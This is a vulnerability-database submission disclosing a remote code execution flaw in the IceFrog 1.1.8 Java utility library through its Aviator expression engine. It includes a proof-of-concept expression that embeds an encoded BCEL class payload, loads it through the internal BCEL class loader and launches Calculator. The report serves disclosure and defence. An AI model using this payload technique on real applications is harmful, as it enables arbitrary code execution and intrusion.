Submission #169999: icefrog v1.1.8 Has an Execute Arbitrary Code vulnerability (Info)

Title: icefrog v1.1.8 Has an Execute Arbitrary Code vulnerability
Description: IceFrog is a suite of core and expanded libraries that include utility classes, collections, I/O classes, and much more, a tool like Guava, Apache Commons, Hutool. In icefrog 1.1.8, the reference enters the aviator engine to parse the expression, and the aviator expression can directly enter the new object, but it is not allowed to call non-public static methods. You can use BCELClassloader to load BCEL code to accomplish RCE. When a user uses icefrog to parse an expression, the aviator template engine is triggered, leading to an arbitrary code execution vulnerability. The test code is here:
import com.whaleal.icefrog.extra.expression.ExpressionUtil;
String exp = "'a'+(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$5dP$cbJ$c3$40$U$3d$d3$a6M$8d$d1$b6$d6$fa$CAW$a6$5d$98$8d$bb$88$hQ$Q$8a$V$x$ee$93x$JS$f2$uy$94$7c$96nT$5c$f8$B$7e$94x$tJ$5b$i$98s$ef$3d$9c$3b$e70_$df$l$9f$A$cep$60$a0$81$8e$81$$$b6$U$f4tl$eb$e8$L4$cfe$y$f3$L$81$ba5x$U$d0$$$93$t$Sh$8fdL$b7E$e4Q$fa$e0z$n3$g$95$e4$L$9cX$a3$a9$3bw$ed$d0$8d$D$7b$92$a72$O$9c$c1$Ku$97$s$3ee$99$p$60$5c$95$3e$cdr$99$c4$99$8e$j$9e$tI$91$fat$z$d5kk4$97$e1$a9Z3$d1$84$aec$d7$c4$k$f6M$YX$X$e8$qi$60S$e9F$b3$90l$a5dji1$f6$a6$e4$e7$C$bd$8a$92$89$7d3$5eX$Jt$97$c2$fb$o$cee$c4nF$40$f9b$e8$5b$aby$ffh$H$c7$d0$f8$83$d4$a9A$a8L$8c$z$9e$O$b9$K$ae$8d$e1$h$c4$L7$i$9e$b1$f9Kr$cf$89yEI$8f$aaU$a0$f5$8e$da$f0$V$f5$e7$7fj$j$s$a3$c6$fd$G$df$cd$ca$aa$fd$D$fe$90$a41$a1$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()) ) + ( c.exec(\"open /System/Applications/Calculator.app\") );";
final Object eval = ExpressionUtil.eval(exp, null);
Source: ⚠️ https://github.com/NanKeXXX/selfVuln_poc/blob/main/whaleal%3Aicefrog/icefrog_1.1.8_RCE.md
User: dreamfly (UID 37785)
Submission: 2023-06-15 08:58 AM (3 years ago)
Moderation: 2023-06-18 09:49 AM (3 days later)
Status: Accepted
VulDB Entry: 231804 [whaleal IceFrog 1.1.8 Aviator Template Engine privilege escalation]
Points: 20